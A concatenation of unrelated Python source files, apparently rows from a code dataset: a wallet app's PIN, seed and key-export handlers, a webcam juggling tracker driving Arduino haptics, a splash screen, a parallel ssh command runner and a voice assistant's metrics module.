from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
video.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Import the relevant files
from sys import exit as Die
try:
import sys
import time
import cv2
import time
import imutils
import numpy as np
from threading import Thread
from colordetection import ColorDetector
import os
import pickle
import serial
except ImportError as err:
Die(err)
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
'''
Testing variable
set to false to start task 2 & 3
'''
cameratesting = False
'''
Initialize the camera here
'''
cam_port = 0
cam = WebcamVideoStream(src=cam_port).start()
calibrationfile = "calibration.txt"
num_data_points = 30
time_limit = 30
RED = (0, 0, 200)
BLUE = (200, 0, 0)
GREEN = (0, 200, 0)
def empty_callback(x):
'''
Empty function for callback when slider positions change. Need input x, this is the value
the slider has changed to. You don't need to do anything in this function.
'''
pass
def scan():
"""
Open up the webcam and scans the 9 regions in the center
and show a preview.
After hitting the space bar to confirm, the block below the
current stickers shows the current state that you have.
This is show every user can see what the computer took as input.
:returns: dictionary
"""
# Read the calibration values from file
if os.path.exists(calibrationfile):
file = open(calibrationfile, "rb")
defaultcal = pickle.load(file)
file.close()
# If no calibration file exists, create it and use the default values
else:
defaultcal = { # default color calibration (based on IDC garage)
'red': [[179, 225, 160], [155, 160, 65]],
'blue': [[105, 255, 180], [95, 200, 40]],
'green': [[88, 192, 146], [30, 69, 73]]
}
file = open(calibrationfile, "wb")
pickle.dump(defaultcal, file)
file.close()
colorcal = {} # color calibration dictionary
color = ['red', 'blue', 'green'] # list of valid colors
line_color = [RED, BLUE, GREEN]
cv2.resizeWindow('default', 1000, 1000)
# create trackbars here
cv2.createTrackbar('H Upper', "tool", defaultcal[color[len(colorcal)]][0][0], 179, empty_callback)
cv2.createTrackbar('H Lower', "tool", defaultcal[color[len(colorcal)]][1][0], 179, empty_callback)
cv2.createTrackbar('S Upper', "tool", defaultcal[color[len(colorcal)]][0][1], 255, empty_callback)
cv2.createTrackbar('S Lower', "tool", defaultcal[color[len(colorcal)]][1][1], 255, empty_callback)
cv2.createTrackbar('V Upper', "tool", defaultcal[color[len(colorcal)]][0][2], 255, empty_callback)
cv2.createTrackbar('V Lower', "tool", defaultcal[color[len(colorcal)]][1][2], 255, empty_callback)
cv2.createTrackbar('Max Ball Size', "tool", 100, 100, empty_callback)
cv2.createTrackbar('Min Ball Size', "tool", 6, 100, empty_callback)
# Remember that the range for S and V are not 0 to 179
# make four more trackbars for ('S Upper', 'S Lower', 'V Upper', 'V Lower')
# Note you should use these trackbar names to make other parts of the code run properly
trajectory = [[] for _ in color]
wait_for_peak = [True for _ in color]
left_throw = False
right_throw = False
screen_width = 600
limit_height = 200
bottom_height = 400
TURN_ON_LEFT = b'1'
TURN_ON_RIGHT = b'2'
# Actuation Variables
checker_time = time.time() # timer for determining actuation (checks drops and throws every 30 secs)
throw_time = 0 # timer for time between throws
drop_time = 0 # timer for time after ball(s) drop
haptics_on = True
msg = ''
msg_frames = 200
msg_frame_count = 0
# There are six levels of actuation:
# - two for each level of juggling (1 ball, 2 balls, 3 balls)
# o one with haptics and one without
while True:
frame = cam.read()
while frame is None:
pass
frame = imutils.resize(frame, width=screen_width) # may not be necessary
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # generates an hsv version of frame and
# stores it in the hsv image variable
key = cv2.waitKey(1) & 0xff
# quit on escape.
if key == 27:
break
# get area constraints
max_size = cv2.getTrackbarPos('Max Ball Size', 'tool')
min_size = cv2.getTrackbarPos('Min Ball Size', 'tool') + 1
for index, name in enumerate(color):
trajectory_color = line_color[index]
# find current ball color
if name == "red":
# gets calibration values
hu, su, vu = defaultcal[name][0]
hl, sl, vl = defaultcal[name][1]
# makes mask
lower_hsv = np.array([0, sl, vl])
upper_hsv = np.array([hl, su, vu])
mask1 = cv2.inRange(hsv, lower_hsv, upper_hsv)
lower_hsv = np.array([hu, sl, vl])
upper_hsv = np.array([179, su, vu])
mask2 = cv2.inRange(hsv, lower_hsv, upper_hsv)
# make a mask with current ball color
mask = cv2.bitwise_or(mask1, mask2)
else:
upper_hsv = np.array(defaultcal[name][0])
lower_hsv = np.array(defaultcal[name][1])
# make a mask with current ball color
mask = cv2.inRange(hsv, lower_hsv, upper_hsv) # makes a mask where pixels with hsv in bounds
# erosions and dilations remove any small blobs left in the mask
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# convert masked image to grayscale, run thresholding and contour detection
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
if len(cnts) > 0:
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
if not (max_size > radius > min_size) or (y > bottom_height):
continue
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# draw some stuff!
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
# adds point to trajectory
if len(trajectory[index]) == num_data_points:
trajectory[index] = trajectory[index][1:] + [center]
else:
trajectory[index].append(center)
end_of_parabola = False
# draws trajectory up to penultimate point
for i in range(1, len(trajectory[index]) - 1):
before = trajectory[index][i - 1]
after = trajectory[index][i]
if not (before[1] < limit_height) or not (after[1] < limit_height):
if end_of_parabola:
break
continue
end_of_parabola = True
# line_weight = int(np.sqrt(num_data_points / float(i + 1)) * 2)
cv2.line(frame,
before,
after,
trajectory_color,
2)
# calculates drop time
if throw_time > 0:
time_diff = time.time() - throw_time
if time_diff > 1:
drop_time += time_diff - 3
throw_time = time.time()
# last point in trajectory
i = len(trajectory[index]) - 1
before = trajectory[index][i - 1]
after = trajectory[index][i]
cv2.line(frame,
before,
after,
trajectory_color,
2)
# checks if it is a left or right throw
if after[0] > before[0]: # if the ball is moving to the right in footage
left_throw = True
elif after[0] < before[0]: # if the ball is moving to the left in footage
right_throw = True
# if the trajectory is going up and is near the top of the frame
falling = (after[1] < before[1]) and (before[1] < limit_height)
if not falling:
wait_for_peak[index] = True
# TODO limit the following actions to only two and three-ball juggles
if falling and wait_for_peak[index]:
if left_throw and haptics_on:
wait_for_peak[index] = False
left_throw = False
ser.write(TURN_ON_LEFT)
print("\nVibrate Left\n")
elif right_throw and haptics_on:
wait_for_peak[index] = False
right_throw = False
ser.write(TURN_ON_RIGHT)
print("\nVibrate Right\n")
# draws a line showing the height one must throw the ball for detection
cv2.line(frame,
(0, limit_height),
(screen_width, limit_height),
(0, 0, 0),
1)
# If "c" is pressed, enter calibration sequence
if key == 99:
colorcal = {}
cv2.setTrackbarPos('H Upper', 'tool', defaultcal[color[len(colorcal)]][0][0])
cv2.setTrackbarPos('S Upper', 'tool', defaultcal[color[len(colorcal)]][0][1])
cv2.setTrackbarPos('V Upper', 'tool', defaultcal[color[len(colorcal)]][0][2])
cv2.setTrackbarPos('H Lower', 'tool', defaultcal[color[len(colorcal)]][1][0])
cv2.setTrackbarPos('S Lower', 'tool', defaultcal[color[len(colorcal)]][1][1])
cv2.setTrackbarPos('V Lower', 'tool', defaultcal[color[len(colorcal)]][1][2])
while len(colorcal) < len(defaultcal):
frame = cv2.flip(cam.read(), 1)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
key = cv2.waitKey(1) & 0xff
# hue upper lower
hu = cv2.getTrackbarPos('H Upper', 'tool')
hl = cv2.getTrackbarPos('H Lower', 'tool')
# saturation upper lower
su = cv2.getTrackbarPos('S Upper', 'tool')
sl = cv2.getTrackbarPos('S Lower', 'tool')
# value upper lower
vu = cv2.getTrackbarPos('V Upper', 'tool')
vl = cv2.getTrackbarPos('V Lower', 'tool')
# handles more orangish hint of red
if color[len(colorcal)] == 'red':
lower_hsv = np.array([0, sl, vl])
upper_hsv = np.array([hl, su, vu])
mask1 = cv2.inRange(hsv, lower_hsv, upper_hsv)
lower_hsv = np.array([hu, sl, vl])
upper_hsv = np.array([179, su, vu])
mask2 = cv2.inRange(hsv, lower_hsv, upper_hsv)
# make a mask with current ball color
mask = cv2.bitwise_or(mask1, mask2)
lower_hsv = np.array([hl, sl, vl])
upper_hsv = np.array([hu, su, vu])
else:
lower_hsv = np.array([hl, sl, vl])
upper_hsv = np.array([hu, su, vu])
# make a mask with current ball color
mask = cv2.inRange(hsv, lower_hsv, upper_hsv)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
res = cv2.bitwise_and(frame, frame, mask=mask)
if key == 32:
defaultcal[color[len(colorcal)]] = [upper_hsv, lower_hsv]
colorcal[color[len(colorcal)]] = [upper_hsv, lower_hsv]
if len(colorcal) < len(defaultcal):
cv2.setTrackbarPos('H Upper', 'tool', defaultcal[color[len(colorcal)]][0][0])
cv2.setTrackbarPos('S Upper', 'tool', defaultcal[color[len(colorcal)]][0][1])
cv2.setTrackbarPos('V Upper', 'tool', defaultcal[color[len(colorcal)]][0][2])
cv2.setTrackbarPos('H Lower', 'tool', defaultcal[color[len(colorcal)]][1][0])
cv2.setTrackbarPos('S Lower', 'tool', defaultcal[color[len(colorcal)]][1][1])
cv2.setTrackbarPos('V Lower', 'tool', defaultcal[color[len(colorcal)]][1][2])
if len(colorcal) < len(defaultcal):
text = 'calibrating {}'.format(color[len(colorcal)])
cv2.putText(res, text, (20, 460), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.imshow("default", res)
# quit on escape key.
if key == 27:
throw_time = 0
drop_time = 0
checker_time = time.time()
break
if key == 83:
# saves the calibration to a file
file = open(calibrationfile, "wb")
pickle.dump(defaultcal, file)
file.close()
print("file saved")
if time.time() - checker_time > time_limit: # 30 seconds have passed since last check
if drop_time / time_limit <= .1 and throw_time != 0:
if not haptics_on:
msg = "You may now juggle one more ball"
haptics_on = not haptics_on # swaps between on and off when upgrading
elif drop_time / time_limit >= .5 or throw_time == 0:
if not haptics_on:
haptics_on = True
msg = "You should juggle one less ball"
throw_time = 0
drop_time = 0
checker_time = time.time()
# show result
frame = cv2.flip(frame, 1)
cv2.putText(frame, msg, (150, 150), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)
cv2.imshow("default", frame)
if msg != '': # remove actuation message
msg_frame_count += 1
if msg_frame_count >= msg_frames:
msg_frame_count = 0
msg = ''
# end of scan()
cv2.destroyAllWindows()
cam.stop()
if __name__ == '__main__':
port = 'COM3' # change based on Arduino
baudrate = 115200 # change based on Arduino
ser = serial.Serial(port, baudrate, writeTimeout=0)
time.sleep(2)
cv2.namedWindow('default', cv2.WINDOW_NORMAL)
cv2.namedWindow('tool', cv2.WINDOW_NORMAL)
scan()
ser.close()
|
startup_flair.pyw | import time, os, threading as thread, pathlib
from tkinter import *
from PIL import Image, ImageTk
PATH = str(pathlib.Path(__file__).parent.absolute())
scalar = 0.6
def doAnimation():
root = Tk()
root.configure(bg='black')
root.frame = Frame(root, borderwidth=2, relief=RAISED)
root.wm_attributes('-topmost', 1)
root.overrideredirect(1)
img_ = Image.open(os.path.join(PATH, 'default_assets', 'loading_splash.png'))
img = ImageTk.PhotoImage(img_.resize((int(img_.width * scalar), int(img_.height * scalar)), resample=Image.ANTIALIAS))
root.geometry('{}x{}+{}+{}'.format(img.width(), img.height(), int((root.winfo_screenwidth() - img.width()) / 2), int((root.winfo_screenheight() - img.height()) / 2)))
lbl = Label(root, image=img)
lbl.pack()
root.attributes('-alpha', 0)
thread.Thread(target=lambda: anim(root)).start()
root.mainloop()
def anim(root):
alpha = 0.0
step = 0.01
for i in range(int(1 / step)):
root.attributes('-alpha', alpha)
alpha += step
time.sleep(step)
time.sleep(2)
for i in range(int(1 / (2*step))):
root.attributes('-alpha', alpha)
alpha -= 2*step
time.sleep(step/4)
os.kill(os.getpid(), 9)
doAnimation() |
python_test04.py | #!env python
# -*- coding: utf-8 -*-
"""
Python test 04:
Run user-selected command on many servers (user provided as param) with
ssh in parallel, collect output from all nodes. Script should print
collected output from all nodes on stdout, w/o using temp files
"""
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
import errno
# we need >= 3.4 b/c of queue, threading module naming changes
# yeah, if it is needed we can support 2.x and 3.x branches, but hey
# this is kinda out of the scope, right? :D
try:
assert sys.version_info >= (3,4)
except AssertionError:
print("ERROR: Python >= 3.4 is REQUIRED")
sys.exit(errno.ENOPKG)
import shlex
import queue
import threading
import subprocess
import argparse
import logging
__author__ = "Oleksii S. Malakhov <brezerk@brezblock.org.ua>"
__license__ = "CC0"
# setup logger
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
class Singleton(type):
"""
Singleton class
"""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class RCHandler(object):
"""
ReturnCode handler
"""
__metaclass__ = Singleton
def __init__(self):
self.rc__ = 0
def addRC(self, rc):
self.rc__ += rc
def getRC(self):
return self.rc__
rc_handler = RCHandler()
# ok. let's define some custom exceptions
class ValidationError(Exception):
def __init__(self, message):
super(ValidationError, self).__init__(message)
thread_fault = False
def worker():
"""
Simple worker function.
"""
while True:
item = q.get()
if item is None:
break
run_process(item['addr'], item['command'])
q.task_done()
def die(message):
"""
Print error and dies
"""
logger.error(message)
sys.exit(errno.EAGAIN)
def validate_command(command):
"""
Validate command.
Proably we should use something like shlex or so too
command: command to validate
"""
if not command:
raise ValidationError("Error: empty command")
def validate_addr(addr):
"""
Validate address
FIXME: Yeah, I would add some more regexp, etc :D
addr: address to validate
"""
if not addr:
raise ValidationError("Error: empty address")
def run_process(addr, command):
"""
Run command and reutn the result.
command: Command str. This one will be split using shlex.
"""
try:
args = shlex.split("ssh %s %s" % (addr, command))
with subprocess.Popen(args,
stdout=subprocess.PIPE) as proc:
proc.wait()
stdout = proc.stdout.read().decode("utf-8")
rc_handler.addRC(proc.returncode)
if proc.returncode != 0:
logger.error('Command %s on host %s failed' % (command, addr))
else:
for line in stdout.splitlines():
print("%s: %s" % (addr, line))
except Exception as exp:
logger.error('Command %s on host %s failed: %s' % str(exp))
if __name__ == "__main__":
logger.warning("Hello, my konfu is the best! :P")
parser = argparse.ArgumentParser(description="""Run user-selected command
on many servers via ssh in parallel, collect output from all nodes.""")
parser.add_argument('--addr', nargs='+',
help='Server address',
required=True)
parser.add_argument('--command', help='User-seelcted command',
required=True)
ns = parser.parse_args()
command = ns.command
addrs = ns.addr
# probable can be a param
workers_count = 4
try:
validate_command(command)
for addr in addrs:
validate_addr(addr)
q = queue.Queue()
threads = []
for i in range(workers_count):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
for addr in addrs:
item = {'addr': addr, 'command': command}
q.put(item)
q.join()
for i in range(workers_count):
q.put(None)
for t in threads:
t.join()
except ValidationError as exp:
die(exp)
sys.exit(rc_handler.getRC())
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from queue import Queue, Empty
import threading
import time
import requests
from mycroft.api import DeviceApi, is_paired
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util.log import LOG
from mycroft.version import CORE_VERSION_STR
from copy import copy
class _MetricSender(threading.Thread):
"""Thread responsible for sending metrics data."""
def __init__(self):
super().__init__()
self.queue = Queue()
self.daemon = True
self.start()
def run(self):
while True:
time.sleep(30)
try:
while True: # Try read the queue until it fails
report_metric(*self.queue.get_nowait())
time.sleep(0.5)
except Empty:
pass # If the queue is empty just continue the loop
except Exception as e:
LOG.error('Could not send Metrics: {}'.format(repr(e)))
_metric_uploader = _MetricSender()
def report_metric(name, data):
"""
Report a general metric to the Mycroft servers
Args:
name (str): Name of metric. Must use only letters and hyphens
data (dict): JSON dictionary to report. Must be valid JSON
"""
try:
if is_paired() and Configuration().get()['opt_in']:
DeviceApi().report_metric(name, data)
except requests.RequestException as e:
LOG.error('Metric couldn\'t be uploaded, due to a network error ({})'
.format(e))
def report_timing(ident, system, timing, additional_data=None):
"""Create standardized message for reporting timing.
Args:
ident (str): identifier of user interaction
system (str): system the that's generated the report
timing (stopwatch): Stopwatch object with recorded timing
additional_data (dict): dictionary with related data
"""
additional_data = additional_data or {}
report = copy(additional_data)
report['id'] = ident
report['system'] = system
report['start_time'] = timing.timestamp
report['time'] = timing.time
_metric_uploader.queue.put(('timing', report))
class Stopwatch:
"""
Simple time measuring class.
"""
def __init__(self):
self.timestamp = None
self.time = None
def start(self):
"""
Start a time measurement
"""
self.timestamp = time.time()
def lap(self):
cur_time = time.time()
start_time = self.timestamp
self.timestamp = cur_time
return cur_time - start_time
def stop(self):
"""
Stop a running time measurement. returns the measured time
"""
cur_time = time.time()
start_time = self.timestamp
self.time = cur_time - start_time
return self.time
def __enter__(self):
"""
Start stopwatch when entering with-block.
"""
self.start()
def __exit__(self, tpe, value, tb):
"""
Stop stopwatch when exiting with-block.
"""
self.stop()
def __str__(self):
cur_time = time.time()
if self.timestamp:
return str(self.time or cur_time - self.timestamp)
else:
return 'Not started'
class MetricsAggregator:
"""
MetricsAggregator is not threadsafe, and multiple clients writing the
same metric "concurrently" may result in data loss.
"""
def __init__(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def increment(self, name, value=1):
cur = self._counters.get(name, 0)
self._counters[name] = cur + value
def timer(self, name, value):
cur = self._timers.get(name)
if not cur:
self._timers[name] = []
cur = self._timers[name] = []
cur.append(value)
def level(self, name, value):
self._levels[name] = value
def clear(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def attr(self, name, value):
self._attributes[name] = value
def flush(self):
publisher = MetricsPublisher()
payload = {
'counters': self._counters,
'timers': self._timers,
'levels': self._levels,
'attributes': self._attributes
}
self.clear()
count = (len(payload['counters']) + len(payload['timers']) +
len(payload['levels']))
if count > 0:
# LOG.debug(json.dumps(payload))
def publish():
publisher.publish(payload)
threading.Thread(target=publish).start()
class MetricsPublisher:
def __init__(self, url=None, enabled=False):
conf = Configuration().get()['server']
self.url = url or conf['url']
self.enabled = enabled or conf['metrics']
def publish(self, events):
if 'session_id' not in events:
session_id = SessionManager.get().session_id
events['session_id'] = session_id
if self.enabled:
requests.post(
self.url,
headers={'Content-Type': 'application/json'},
data=json.dumps(events), verify=True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.